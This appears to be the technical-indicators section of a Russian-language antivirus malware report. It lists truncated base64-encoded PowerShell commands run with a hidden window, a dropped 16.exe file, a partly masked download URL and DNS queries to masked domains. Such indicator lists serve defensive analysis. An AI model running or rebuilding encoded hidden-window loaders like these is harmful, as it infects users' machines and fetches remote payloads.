Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGQAeQBuAGYAYQBmAG4AbQBvAD0AJwBLAHEAegB3AHQAegBsAGUAbQBuAG4AdQAnADsAJABMAG0AdABkAHUAegBnAHUAdwB5AC...
- %HOMEPATH%\16.exe
- %HOMEPATH%\16.exe
- %HOMEPATH%\16.exe
- http://we#####stdatacom.com/tlx8/fkk/
- DNS ASK wm#.###ceskillion.com
- DNS ASK tr####envision.com
- DNS ASK tr###lexeq.com
- DNS ASK we#####stdatacom.com
- DNS ASK va###nesia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAGQAeQBuAGYAYQBmAG4AbQBvAD0AJwBLAHEAegB3AHQAegBsAGUAbQBuAG4AdQAnADsAJABMAG0AdABkAHUAegBnAHUAdwB5AC...' (со скрытым окном)